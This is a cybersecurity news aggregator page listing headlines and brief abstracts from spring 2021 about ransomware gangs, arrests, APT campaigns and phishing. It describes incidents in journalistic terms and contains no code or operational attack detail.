Binance exchange helped track down Clop ransomware money launderers Full Text

Abstract Cryptocurrency exchange service Binance played an important part in the recent arrests of Clop ransomware group members, helping law enforcement in their effort to identify, and ultimately detain the suspects.

BleepingComputer

June 24, 2021

Arrested Clop gang members laundered over $500M in ransomware payments Full Text

Abstract The members of the Cl0p ransomware gang that were arrested in Ukraine as part of an international law enforcement action also operated money laundering services for multiple cybercrime groups.

The Record

June 23, 2021

LV ransomware operators repurposed a REvil binary to launch a new RaaS Full Text

Abstract The LV ransomware operators repurposed a REvil binary to create their own strain and launch a ransomware-as-a-service (RaaS). A threat actor known as LV ransomware gang is trying to enter the cybercrime arena, it repurposed a REvil binary almost to create...

Security Affairs

June 23, 2021

Ransomware Gang Cl0p Announces New Victim After Police Bust Full Text

Abstract Recent arrests of Cl0p members were seen as a victory against the gang that has hit dozens of victims, including U.S. bank Flagstar, law firm Jonesday, Shell, and some universities in the U.S.

Vice

June 23, 2021

Scammer arrested for phishing operation, sent 25,000 texts in a day Full Text

Abstract The police has arrested an individual last week for sending fraudulent text messages to thousands of people to obtain banking details and defraud them.

BleepingComputer

June 23, 2021

Clop ransomware is back in business after recent arrests Full Text

Abstract The Clop ransomware operation is back in business after recent arrests and has begun listing new victims on their data leak site again.

BleepingComputer

June 23, 2021

FIN7 Cybercriminals Impersonated SEC Officials, Sick Restaurant Customers to Lure Victims Full Text

Abstract FIN7 impersonated angry restaurant customers and targeted specific individuals with access to financial information, U.S. prosecutors argue in a court filing that sheds new light on the hacker group.

Cyberscoop

June 22, 2021

Mysterious ransomware payment traced to a sensual massage site Full Text

Abstract ​A ransomware targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages.

BleepingComputer

June 21, 2021

Lazarus Sub-group Evolves to Target South Korea Full Text

Abstract This year in April, a suspicious Word document was spotted that had a Korean file name and decoy. On analysis, researchers found a unique infection pattern and an unknown payload.

Cyware Alerts - Hacker News

June 21, 2021

Cybecriminals Claim to Plant Backdoor and Steal Data From NATO’s Cloud Platform Full Text

Abstract Cybercriminals claim that they managed to make copies of the data on the SOA & IdM platform used by NATO by planting a malware backdoor and that they tried to blackmail Everis.

Softpedia News

June 21, 2021

Data leak marketplace pressures victims by emailing competitors Full Text

Abstract The Marketo data theft marketplace is applying maximum pressure on victims by emailing their competitors and offering sample packs of the stolen data.

BleepingComputer

June 21, 2021

Inside a ransomware attack: how dark webs of cybercriminals collaborate to pull one off Full Text

Abstract Not only is a ransomware attack a blended crime, including different offenses across different bodies of law, but also a crime that straddles the remit of different policing agencies and countries.

The Times Of India

June 21, 2021

Ransomware Actors Evolved Operations in 2020 Full Text

Abstract Over the last several years, cybercrime adversaries that engage in big game hunting ransomware attacks have advanced rapidly in terms of their capabilities and sophistication.

Crowdstrike

June 19, 2021

A deep dive into the operations of the LockBit ransomware group Full Text

Abstract Forensic investigations of machines attacked by LockBit affiliates show that threat groups will often first try to identify "mission-critical" systems including NAS devices, backup servers, and domain controllers.

ZDNet

June 18, 2021

Ferocious Kitten Uses MarkiRAT to Target Iranian Regime Full Text

Abstract An APT group based out of Iran is actively targeting Iranian users to deliver MarkiRAT that records keystrokes and clipboard content. Two suspicious documents related to it were uploaded to VirusTotal. It appears attackers are trying to enhance their arsenal with new tools to make their attack ... Read More

Cyware Alerts - Hacker News

June 18, 2021

Texan Admits Data Center Bomb Plot Full Text

Abstract Wichita Falls man hoped to “kill off 70% of the internet” by obliterating Virginia data center

Infosecurity Magazine

June 18, 2021

Fake DarkSide gang targets energy, food industry in extortion emails Full Text

Abstract Threat actors impersonate the now-defunct DarkSide Ransomware operation in fake extortion emails sent to companies in the energy and food sectors.

BleepingComputer

June 18, 2021

A deep dive into the operations of the LockBit ransomware group Full Text

Abstract An investigation revealed that LockBit affiliates most often will buy RDP access to servers as an initial attack vector, although they may also use typical phishing and credential stuffing techniques.

ZDNet

June 18, 2021

Threat Actors in Recent Campaign Pose as Darkside to Target Energy and Food Sectors Full Text

Abstract The content of the emails led researchers to believe that they did not come from Darkside, but from an attacker trying to profit off the current situation around DarkSide ransomware activities.

Trend Micro

June 17, 2021

Senators unveil legislation to crack down on cyber criminals Full Text

Abstract A bipartisan group of senators on Thursday unveiled legislation intended to crack down on cyber criminals, who have increasingly posed a threat to critical U.S. organizations. 

The Hill

June 17, 2021

Molerats Hackers Return With New Attacks Targeting Middle Eastern Governments Full Text

Abstract A Middle Eastern advanced persistent threat (APT) group has resurfaced after a two-month hiatus to target government institutions in the Middle East and global government entities associated with geopolitics in the region in a rash of new campaigns observed earlier this month. Sunnyvale-based enterprise security firm Proofpoint attributed the activity to a politically motivated threat actor it tracks as TA402 , and known by other monikers such as  Molerats  and GazaHackerTeam. The threat actor is believed to be active for a decade, with a history of striking organizations primarily located in Israel and Palestine, and spanning multiple verticals such as technology, telecommunications, finance, academia, military, media, and governments. The latest wave of attacks commenced with spear-phishing emails written in Arabic and containing PDF attachments that come embedded with a malicious geofenced URL to selectively direct victims to a password-protected archive only if the source IP a

The Hacker News

June 17, 2021

UNC2465 cybercrime group launched a supply chain attack on CCTV vendor Full Text

Abstract UNC2465 cybercrime group that is affiliated with the Darkside ransomware gang has infected with malware the website of a CCTV camera vendor. An affiliate of the Darkside ransomware gang, tracked as UNC2465, has conducted a supply chain attack against...

Security Affairs

June 17, 2021

Cybercriminals Go After Amazon Prime Day Shoppers with Spoofed Domains Full Text

Abstract In the last 30 days, over 2300 new domains were registered about Amazon, a 10% increase from the previous Amazon Prime Day, where the majority now are either malicious or suspicious.

Check Point Research

June 16, 2021

An international joint operation resulted in the arrest of Clop ransomware members Full Text

Abstract Ukraine police arrested multiple individuals that are believed to be linked to the Clop ransomware gang as part of an international joint operation. Ukraine police arrested multiple individuals that are believed to be linked to the Clop ransomware...

Security Affairs

June 16, 2021

Avaddon Ransomware Gang Evaporates Amid Global Crackdowns   Full Text

Abstract Ransomware group releases decryptors for nearly 3,000 victims, forfeiting millions in payouts.    

Threatpost

June 16, 2021

Gold Winter is the Group Behind Hades Ransomware Full Text

Abstract Researchers took the wraps off the operators of the Hades ransomware as they came across a new adversary group Gold Winter, whose behavior coincides with the former. The recent finding suggests that threat actors may be deliberately trying to find ways to look different or evolve their attack techn ... Read More

Cyware Alerts - Hacker News

June 16, 2021

Avaddon Ransomware Calls it Quit, Distributes Keys for Free Full Text

Abstract The Avaddon ransomware gang has shared 2,934 decryption keys , with Bleeping Computer, shrouded in an anonymous tip pretending to be from the FBI. The team soon shared it with Emsisoft, who confirmed the legitimacy of the keys.

Cyware Alerts - Hacker News

June 16, 2021

Members of Clop Ransomware Gang Arrested in Ukraine Full Text

Abstract A police operation in Ukraine has led to the arrest of six people allegedly part of the notorious Clop ransomware group

Infosecurity Magazine

June 16, 2021

Cl0p affiliated hackers exposed in Ukraine Full Text

Abstract Ukrainian police reported uncovering a group of hackers who used the Cl0p ransomware to extort money from foreign businesses, mainly in the United States and South Korea.

Cyber News

June 16, 2021

Ukraine Police Arrest Cyber Criminals Behind Clop Ransomware Attacks Full Text

Abstract Ukrainian law enforcement officials on Wednesday announced the arrest of the  Clop ransomware  gang, adding it disrupted the infrastructure employed in attacks targeting victims worldwide since at least 2019. As part of a joint operation between the National Police of Ukraine and authorities from the Republic of Korea and the U.S., six defendants have been accused of running a double extortion scheme wherein victims refusing to pay a ransom were threatened with the leak of sensitive financial, customer, or personal data stolen from them prior to encrypting the files. The ransomware attacks amount to $500 million in monetary damages, the National Police  said , noting that "law enforcement has managed to shut down the infrastructure from which the virus spreads and block channels for legalizing criminally acquired cryptocurrencies." Law enforcement officers are said to have conducted 21 searches in the Ukrainian capital and Kyiv region, including the homes of the defendan

The Hacker News

June 16, 2021

Ukraine arrests Clop ransomware gang members, seizes servers Full Text

Abstract Ukrainian law enforcement arrested cybercriminals associated with the Clop ransomware gang and shut down infrastructure used in attacks targeting victims worldwide since at least 2019.

BleepingComputer

June 16, 2021

Ransomware Attackers Partnering With Cybercrime Groups to Hack High-Profile Targets Full Text

Abstract As ransomware attacks against critical infrastructure skyrocket, new research shows that threat actors behind such disruptions are increasingly shifting from using email messages as an intrusion route to purchasing access from cybercriminal enterprises that have already infiltrated major targets. "Ransomware operators often buy access from independent cybercriminal groups who infiltrate major targets and then sell access to the ransomware actors for a slice of the ill-gotten gains," researchers from Proofpoint said in a write-up shared with The Hacker News. "Cybercriminal threat groups already distributing banking malware or other trojans may also become part of a ransomware affiliate network." Besides angling for a piece of the illegal profits, the email and cloud security firm said it is currently tracking at least 10 different threat actors who play the role of "initial access facilitators" to supply affiliates and other cybercrime groups with an e

The Hacker News

June 16, 2021

Andariel Threat Group Evolves to Target South Korean Entities with Custom Ransomware Full Text

Abstract The threat actor has been spreading the third stage payload from the middle of 2020 onwards and leveraged malicious Word documents and files mimicking PDF documents as infection vectors.

Kaspersky Labs

June 15, 2021

Iranian State-Sponsored Cybercriminal Hacked Former Israeli Defense Chief Full Text

Abstract Yaser Balaghi, a cybercriminal working for Iran attacked the computer of a former IDF chief of staff and gained access to his entire computer database, says Times of Israel.

Softpedia

June 15, 2021

Former NSA contractor Reality Winner who leaked gov report will be released on November Full Text

Abstract Reality Winner, a former NSA contractor who leaked classified documents to the press in 2017, has been released from prison to home confinement. Reality Winner is a former NSA intelligence contractor who leaked a classified hacking report to the press...

Security Affairs

June 15, 2021

REvil ransomware gang hit US nuclear weapons contractor Sol Oriens Full Text

Abstract The REvil ransomware gang made the headlines again, the group hit the US nuclear weapons contractor Sol Oriens and stole the victim's data. US nuclear weapons contractor Sol Oriens was hit by a cyberattack carried out by the REvil ransomware operators,...

Security Affairs

June 14, 2021

Biden Opposes Conditional Handover of Cyber-criminals Full Text

Abstract Biden snuffs out Putin’s proposal to agree to conditional handover of cyber-criminals between Russia and US

Infosecurity Magazine

June 14, 2021

One of ransomware’s top negotiators would rather you not have to hire him Full Text

Abstract Kurtis Minder, CEO of threat intelligence firm GroupSense, has received a lot of press as a top negotiator in ransomware cases. But he’d rather you not hire him to negotiate. Instead, he says, he’d much rather you stop the ransomware attack before you’d ever need to call him in.

SCMagazine

June 13, 2021

Chinese Hackers Believed to be Behind Second Cyberattack on Air India Full Text

Abstract Even as a massive data breach affecting Air India came to light the previous month, India's flag carrier airline appears to have suffered a separate cyber assault that lasted for a period of at least two months and 26 days, new research has revealed, which attributed the incident with moderate confidence to a Chinese nation-state threat actor called APT41. Group-IB dubbed the campaign "ColunmTK" based on the names of command-and-control (C2) server domains that were used for facilitating communications with the compromised systems.  "The potential ramifications of this incident for the entire airline industry and carriers that might yet discover traces of ColunmTK in their networks are significant," the Singapore-headquartered threat hunting company  said . While Group-IB alluded that this may have been a supply chain attack targeting SITA, the Swiss aviation information technology company told The Hacker News that they are two different security incidents.

The Hacker News

June 11, 2021

Avaddon ransomware gang shuts down their operations and releases decryption keys Full Text

Abstract The Avaddon ransomware gang has shut down its operations and released the decryption keys to allow victims to recover their files for free. Good news for the victims of the Avaddon ransomware gang, the cybercrime group has shut down its operations...

Security Affairs

June 11, 2021

Avaddon ransomware shuts down and releases decryption keys Full Text

Abstract The Avaddon ransomware gang has shut down operation and released the decryption keys for their victims to BleepingComputer.com.

BleepingComputer

June 11, 2021

US Department of Justice, International Law Enforcement Disrupt Major Marketplace for Cybercriminals Full Text

Abstract The US Justice Department partnered with international law enforcement to take down an online marketplace offering stolen login credentials for various accounts including bank and online payment.

Cyberscoop

June 11, 2021

Cybercriminals Sell Access to FIFA 21 Matchmaking Servers After Attack on Electronic Arts Full Text

Abstract Electronic Arts, the maker of popular video games including FIFA, Madden, Sims, and others, said Thursday that it was investigating an intrusion that led to the leak of game source code and tools.

New York Times

June 11, 2021

New Cyber Espionage Group Targeting Ministries of Foreign Affairs Full Text

Abstract Cybersecurity researchers on Thursday took the wraps off a new cyberespionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017. Dubbed " BackdoorDiplomacy ," the campaign involves targeting weak points in internet-exposed devices such as web servers to perform a panoply of cyber hacking activities, including laterally moving across the network to deploy a custom implant called Turian that's capable of exfiltrating sensitive data stored in removable media. "BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. Turian likely represents a next stage evolution of  Quarian , the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S," said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET. Engineered to target both Windows and Linux operating systems, the

The Hacker News

June 10, 2021

‘Fancy Lazarus’ Cyberattackers Ramp up Ransom DDoS Efforts Full Text

Abstract The group, known for masquerading as various APT groups, is back with a spate of attacks on U.S. companies.

Threatpost

June 10, 2021

Evil Corp Rebranded its Ransomware Operation Again Full Text

Abstract The most-wanted Russian hacking group recently rebranded itself as new PayloadBIN ransomware to evade sanctions imposed by the U.S. Treasury. Previously, the gang had mimicked the Hades ransomware to bypass U.S. sanctions. The gang started rebranding its ransomware operations to different names (Ha ... Read More

Cyware Alerts - Hacker News

June 09, 2021

Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack Full Text

Abstract ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year.

BleepingComputer

June 9, 2021

Cybercriminals Impersonate FINRA to Target Members Firms via Targeted Phishing Attacks Full Text

Abstract FINRA reminded financial industry firms to verify the legitimacy of any suspicious email prior to responding to it, opening any attachments, or clicking on any embedded links.

FINRA

June 8, 2021

Evil Corp Rebrands Ransomware to Escape Sanctions Full Text

Abstract Notorious threat group copies name of new Babuk "PayloadBin" leak site

Infosecurity Magazine

June 8, 2021

Cybercriminals Publish Largest Ever Password Compilation with 8.4 Billion Entries on Hacker Forum Full Text

Abstract Since most people reuse their passwords across multiple apps and websites, the number of accounts affected by credential stuffing and password spraying attacks in the wake of this leak is likely huge.

Security Affairs

June 5, 2021

Cybercriminals Target Retail Chains and Food Joints Full Text

Abstract Almost all retail businesses today depend on the internet for most of their operations. While they invest in state-of-the-art platforms, meeting adequate security protocols appears to be a blockage. Retail firms are recommended to invest regularly in their existing security solutions and stay ... Read More

Cyware Alerts - Hacker News

June 3, 2021

FBI confirmed that JBS was hit by the REvil ransomware gang Full Text

Abstract The US FBI announced that REvil ransomware gang (also known as Sodinokibi) is behind the attack that hit JBS Foods. On May 30, the American food processing giant JBS Foods, the world’s largest processor of fresh beef, was forced to shut down production at...

Security Affairs

June 3, 2021

FBI: REvil Ransomware Group Behind JBS Attack Full Text

Abstract The FBI said it would be working to bring the REvil group to justice for the hack on JBS

Infosecurity Magazine

June 2, 2021

REvil Ransomware Ground Down JBS: Sources Full Text

Abstract Responsible nations don’t harbor cybercrooks, the Biden administration admonished Russia, home to the gang that reportedly froze the global food distributor’s systems.

Threatpost

June 02, 2021

FBI: REvil cybergang behind the JBS ransomware attack Full Text

Abstract The Federal Bureau of Investigations has officially stated that the REvil operation, aka Sodinokibi, is behind the ransomware attack targeting JBS, the world's largest meat producer.

BleepingComputer

June 02, 2021

Cybercriminals Hold $115,000-Prize Contest to Find New Cryptocurrency Hacks Full Text

Abstract A top Russian-language underground forum has been running a "contest" for the past month, calling on its community to submit "unorthodox" ways to conduct cryptocurrency attacks. The forum's administrator, in an announcement made on April 20, 2021, invited members to submit papers that assess the possibility of targeting cryptocurrency-related technology, including the theft of private keys and wallets, in addition to covering unusual cryptocurrency mining software, smart contracts, and non-fungible tokens (NFTs). The  contest , which is likely to continue till September 1, will see total prize money of $115,000 awarded to the best research. "So far, the top candidates (according to forum member voting) include topics like generating a fake blockchain front-end website that captures sensitive information such as private keys and balances, creating a new cryptocurrency blockchain from scratch, increasing the hash rate speed of mining farms and botnets, a

The Hacker News

June 2, 2021

Hacking Outfit Linked to Russia Is Behind JBS Cyberattack Full Text

Abstract REvil, a notorious Russia-linked hacking group is behind the cyberattack against JBS SA, according to four people familiar with the assault who were not authorized to speak publicly on the matter.

Bloomberg

June 01, 2021

US: Russian threat actors likely behind JBS ransomware attack Full Text

Abstract White House has confirmed today that JBS, the world's largest beef producer, was hit by a ransomware attack over the weekend coordinated by a group likely from Russia.

BleepingComputer

June 1, 2021

Prometheus and Grief – two new emerging ransomware gangs targeting enterprises. Mexican Government data is published for sale. Full Text

Abstract "Prometheus" and "Grief" - a multi-billion dollar ransomware market obtained two new emerging players. In today's world, information and data means money and the people that are stealing the information have now reached new levels of sophistication....

Security Affairs

June 1, 2021

Prometheus and Grief Ransomware Gangs Release Data From Mexican Government and Private Firm for Sale Full Text

Abstract Prometheus published a stolen data allegedly belonging to the Mexican Government, possibly becoming the first cybercriminal group that has touched a major state in Latin America on such a level.

Security Affairs

May 30, 2021

Interpol has intercepted $83 million from financial cyber crimes Full Text

Abstract Interpol has intercepted $83 million in illicit funds transferred from victims to the accounts used by crooks. An operation conducted by Interpol, codenamed HAECHI-I, conducted by more than 40 officers in the Asia Pacific region over six months period...

Security Affairs

May 30, 2021

Interpol intercepts $83 million fighting financial cyber crime Full Text

Abstract The INTERPOL (short for International Criminal Police Organisation) has intercepted $83 million belonging to victims of online financial crime from being transferred to the accounts of their attackers.

BleepingComputer

May 28, 2021

SolarWinds Hackers Target Think Tanks With New ‘NativeZone’ Backdoor Full Text

Abstract Microsoft on Thursday disclosed that the threat actor behind the  SolarWinds supply chain hack  returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S. "This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations," Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust,  said . "At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work." Microsoft attributed the intrusions to the Russian threat actor it tracks as Nobelium, and by the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), and Dark Halo (Volexity). The latest wave in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalat

The Hacker News

May 28, 2021

Microsoft: SolarWinds hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-based SolarWinds hackers are behind an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer

May 27, 2021

How North Korean Threat Actors Pulled Off Multimillion-Dollar Heists? Full Text

Abstract ClearSky attributed multiple attacks on cryptocurrency exchanges to a threat actor, dubbed CryptoCore, and linked its activities with Lazarus. It swindled hundreds of millions of dollars from the U.S., Israel, Europe, and Japan over the past three years.

Cyware Alerts - Hacker News

May 26, 2021

Cybercriminals Exploiting API Keys to Steal Cryptocurrency Full Text

Abstract Stolen API keys are being increasingly sold on hacker forums. Cyber adversaries are exploiting cryptocurrency exchange API keys and using them to steal cryptocurrencies from victims.

Cyware Alerts - Hacker News

May 26, 2021

Hackers release patient data stolen from New Zealand health systems Full Text

Abstract Hackers sent patient data stolen during an attack on New Zealand’s Waikato District health system to local media outlets on Wednesday, with the outlets declining to publish the sensitive information. 

The Hill

May 26, 2021

Cyber-criminal Gang Targets Texas Unemployment System Full Text

Abstract Scattered Canary shares 13-page tutorial on how to commit fraud via Texas Workforce Commission website

Infosecurity Magazine

May 25, 2021

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract It appears that stolen API keys for cryptocurrency trading apps are being used by cybercriminals to easily empty their victims’ accounts on all major cryptocurrency exchanges.

Cyber News

May 24, 2021

Zeppelin ransomware gang is back after a temporary pause Full Text

Abstract Operators behind the Zeppelin ransomware-as-a-service (RaaS) have resumed their operations after a temporary interruption. Researchers from BleepingComputer reported that operators behind the Zeppelin ransomware-as-a-service (RaaS), aka Buran, have...

Security Affairs

May 24, 2021

Michigan Man Admits Selling UPMC Employee Data Full Text

Abstract "TheDearthStar" hacker confesses to stealing and selling PII of more than 65,000 medical center employees

Infosecurity Magazine

May 21, 2021

DarkSide Getting Taken to ‘Hackers’ Court’ For Not Paying Affiliates Full Text

Abstract A shadow court system for hackers shows how professional ransomware gangs have become.

Threatpost

May 21, 2021

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract CyberNews researchers found that crooks could abuse cryptocurrency exchange API keys and steal cryptocurrencies. Original post available here: https://cybernews.com/security/report-how-cybercriminals-abuse-api-keys-to-steal-millions/ CyberNews...

Security Affairs

May 21, 2021

Ransomware Gang Gifts Decryption Tool to HSE Full Text

Abstract Cyber-criminals give Irish health system free decryption tool after crippling it with ransomware

Infosecurity Magazine

May 21, 2021

DarkSide affiliates claim gang’s bitcoin deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 21, 2021

Bitcoins of DarkSide ransomware gang still locked in hacker forum’s escrow Full Text

Abstract After DarkSide ransomware gang shut down operations, multiple affiliates have complained about not receiving the payments for successful breaches. The decision of the DarkSide ransomware gang to shut down operations is causing chaos among its network...

Security Affairs

May 21, 2021

DarkSide affiliates claim gang’s bitcoins in deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 19, 2021

DarkSide Gang Retires on $90m Full Text

Abstract Wallet containing Bitcoin worth over $90m is reportedly ransomware gang’s ill-gotten gains

Infosecurity Magazine

May 17, 2021

FIN7: Active Again with New Lizar Backdoor Full Text

Abstract The notorious cybercrime gang behind the Carbanak RAT is spreading a backdoor called Lizar under the guise of a Windows pen-testing tool for ethical hackers. Experts say the group may be planning to further sharpen its tools and techniques to make its attacks stealthier and more effective.

Cyware Alerts - Hacker News

May 17, 2021

Transparent Tribe Reappears with Expanded Malware Arsenal and TTPs Full Text

Abstract APT36 was found creating fake domains to impersonate military and defense firms and disseminate malware-laced documents to infect victims with ObliqueRAT and CrimsonRAT. Organizations are recommended to stay vigilant and implement adequate security measures proactively.

Cyware Alerts - Hacker News

May 14, 2021

Darkside gang lost control of their servers and funds Full Text

Abstract The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from the victims. Darkside ransomware operators say they have lost control of their servers and funds resulting...

Security Affairs

May 14, 2021

Arkose Labs looks to hit cybercriminals where it hurts with $70 million cash infusion Full Text

Abstract Funds will filter in part to research and development, building upon the Arkose model of undermining economic drivers behind fraud until attackers opt out.

SCMagazine

May 12, 2021

Cybercriminals Use Fake Android and iOS Apps Disguised as Trading and Cryptocurrency Apps to Conduct Fraud Full Text

Abstract These fraudulent applications are aimed at exploiting the increased interest in trading apps, driven by the recent significant rise in the value of cryptocurrencies and interest in stock trading.

Sophos

May 5, 2021

UNC2529, a new sophisticated cybercrime gang that targets U.S. orgs with 3 malware Full Text

Abstract A new cybercrime gang, tracked as UNC2529, has targeted many organizations in the US and other countries using new sophisticated malware. A new financially motivated threat actor, tracked by FireEye Experts as UNC2529, has targeted many organizations...

Security Affairs

May 3, 2021

Online Child Abuse Platform with 400k Users Taken Down Full Text

Abstract Darknet CSAM site Boystown seized and alleged site operators arrested

Infosecurity Magazine

May 3, 2021

How Cybercriminals Abuse OpenBullet for Credential Stuffing Full Text

Abstract As the business of acquiring unique credentials continues to become more lucrative, cybercriminals are growing their attack tools and techniques by abusing legitimate software for nefarious purposes.

Trend Micro

April 30, 2021

UNC2447 cybercrime gang exploited SonicWall Zero-Day before it was fixed Full Text

Abstract UNC2447 cybercrime gang exploited a zero-day in the Secure Mobile Access (SMA), addressed by SonicWall earlier this year, before the vendor released a fix. Researchers from FireEye’s Mandiant revealed that a sophisticated cybercrime gang tracked...

Security Affairs

April 30, 2021

Hacking group that targeted D.C. police briefly posts internal police files Full Text

Abstract The documents posted Wednesday ran into the hundreds of pages and included names, Social Security numbers, phone numbers, financial and housing records, job histories, and polygraph assessments.

Washington Post

April 29, 2021

With Recent Law Enforcement Actions, Emotet’s Days are Now Over Full Text

Abstract Europol claimed to wipe Emotet infection from hundreds of servers globally. The FBI, meanwhile, handed over 4.3 million email addresses to the Have I Been Pwned site to help mitigate infections.

Cyware Alerts - Hacker News

April 29, 2021

Emotet Group Harvested Over 4.3 Million Victim Emails Full Text

Abstract Concerned users can now check with HaveIBeenPwned

Infosecurity Magazine

April 29, 2021

The Sodinokibi Chronicles: A (R)Evil Cybercrime Gang Disrupting Organizations for Trade Secrets and Cash Full Text

Abstract Once Sodinokibi focuses on a potential victim, the attack goes into a more sophisticated operation by human actors who pave their way through the compromised networks to find data and exfiltrate it.

Security Intelligence

April 28, 2021

A Ransomware Gang is Now Shorting Stock Price of its Victims Full Text

Abstract The Darkside group has advanced its extortion tactics to target companies that are listed on NASDAQ or other stock markets. However, the chances of this technique succeeding are narrow, say experts.

Cyware Alerts - Hacker News

April 28, 2021

Cybercriminals Widely Abusing Excel 4.0 Macro to Distribute Malware Full Text

Abstract Threat actors are increasingly adopting  Excel 4.0 documents  as an initial stage vector to distribute malware such as  ZLoader  and Quakbot, according to new research. The findings come from an analysis of 160,000 Excel 4.0 documents between November 2020 and March 2021, out of which more than 90% were classified as malicious or suspicious. "The biggest risk for the targeted companies and individuals is the fact that security solutions still have a lot of problems with detecting malicious Excel 4.0 documents, making most of these slip by conventional signature based detections and analyst written YARA rules," researchers from ReversingLabs said in a report  published today . Excel 4.0 macros (XLM), the precursor to Visual Basic for Applications (VBA), is a legacy feature incorporated in Microsoft Excel for backward compatibility reasons. Microsoft warns in its  support document  that enabling all macros can cause "potentially dangerous code" to run. The eve

The Hacker News

April 26, 2021

Cybercriminals evolving their tactics to exploit collective human interest Full Text

Abstract Phishing activity increased significantly in the first few months of 2020, taking advantage of pandemic-induced product shortages and increased usage of streaming services, OpenText reveals.

Help Net Security

April 23, 2021

US: Ireland Is a Target for Cyber-Criminals Full Text

Abstract Vast amount of data stored on Emerald Isle a lure for cyber-criminals, warns America’s National Security Division

Infosecurity Magazine

April 22, 2021

Spotlight on the Cybercriminal Supply Chains Full Text

Abstract In this Threatpost podcast Fortinet’s top researcher outlines what a cybercriminal supply chain is and how much the illicit market is worth.

Threatpost

April 22, 2021

Way Too Many Cybercriminal Groups Active Presently Full Text

Abstract A new report disclosed that, with more than 1,900 hacker groups active, including APTs, the current cybercrime landscape is witnessing a rise in new malware variants that are being deployed in the wild.

Cyware Alerts - Hacker News

April 22, 2021

Cybercriminals Using Telegram Messenger to Control ToxicEye Malware Full Text

Abstract Adversaries are increasingly abusing Telegram as a "command-and-control" system to distribute malware into organizations that could then be used to capture sensitive information from targeted systems. "Even when Telegram is not installed or being used, the system allows hackers to send malicious commands and operations remotely via the instant messaging app," said researchers from cybersecurity firm Check Point , who have identified no fewer than 130 attacks over the past three months that make use of a new multi-functional remote access trojan (RAT) called "ToxicEye." The use of Telegram for facilitating malicious activities is not new. In September 2019, an information stealer dubbed  Masad Stealer  was found to plunder information and cryptocurrency wallet data from infected computers using Telegram as an exfiltration channel. Then last year,  Magecart groups  embraced the same tactic to send stolen payment details from compromised websites back to

The Hacker News

April 20, 2021

Europol Report Highlights Pandemic’s Effect on Cybercrime Full Text

Abstract Europol’s Serious Organized Crime Threat Assessment report 2021 summarizes the criminal threat of the last four years and provides insights into what to expect over the next four years.

Security Week

April 20, 2021

Crooks stole driver’s license numbers from Geico auto insurer Full Text

Abstract Car insurance provider Geico has suffered a data breach, attackers have stolen the driver's licenses for policyholders for several weeks. Geico, the second-largest auto insurer in the U.S., has suffered a data breach, threat actors exploited...

Security Affairs

April 19, 2021

Crooks made more than $560K with a simple clipboard hijacker Full Text

Abstract Avast researchers analyzed the activity of a simple cryptocurrency malware dubbed HackBoss that allowed its operators to earn over $560K. While the value of major cryptocurrencies continues to increase, cybercriminals and malware authors focus their...

Security Affairs

April 19, 2021

Cybercriminals Claim to Sell 50GB of Data Exfiltrated from OTP-Generating Company Full Text

Abstract Apart from OTP codes, other data included in the sale involved personally identifiable information (PII) such as SMS logs, mobile numbers, email addresses, SMPP details, customer documents, and more.

Hackread

April 16, 2021

Cybercriminals Hacked into Codecov’s Bash Uploader Tool and Stole Customer Credentials for 2.5 Months Full Text

Abstract Codecov said the breach occurred “because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”

The Record

April 15, 2021

EtterSilent Maldoc Builder - The Hot Selling Cake in Underground Forums Full Text

Abstract According to Intel 471, some cybercriminal groups are leveraging Ettersilent maldoc builder to bypass Windows Defender, Windows AMSI, and top email services including Gmail.

Cyware Alerts - Hacker News

April 15, 2021

Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text

Abstract Over $760 million worth of Bitcoin that were stolen from cryptocurrency exchange Bitfinex in 2016 were moved to new accounts. More than $760 million worth of Bitcoin, stolen from Asian cryptocurrency exchange Bitfinex in 2016, were moved on Wednesday...

Security Affairs

April 15, 2021

Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text

Abstract On August 2016, the Asian Bitfinex suffered a security breach that resulted in the theft of 120,000 Bitcoin, the incident had serious repercussions on the Bitcoin value that significantly dropped after the security breach (-20% decrease).

Security Affairs

April 15, 2021

YIKES! Cybercriminals flood the Internet with 100,00 malicious PDF documents Full Text

Abstract Cybercriminals are resorting to search engine poisoning techniques to lure business professionals into seemingly legitimate Google sites that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks. The attack works by leveraging searches for business forms such as invoices, templates, questionnaires, and receipts as a stepping stone toward infiltrating the systems. Users attempting to download the alleged document templates are  redirected , without their knowledge, to a malicious website that hosts the malware. "Once the RAT is on the victim's computer and activated, the threat actors can send commands and upload additional malware to the infected system, such as ransomware, a credential stealer, a banking trojan, or simply use the RAT as a foothold into the victim's network," researchers from eSentire  said  in a write-up published on Tuesday. The cybersecurity firm said it discovered over 100,000 unique web pages that contain pop

The Hacker News

April 12, 2021

Europol: “Virtually All” Crime Now Has a Digital Element Full Text

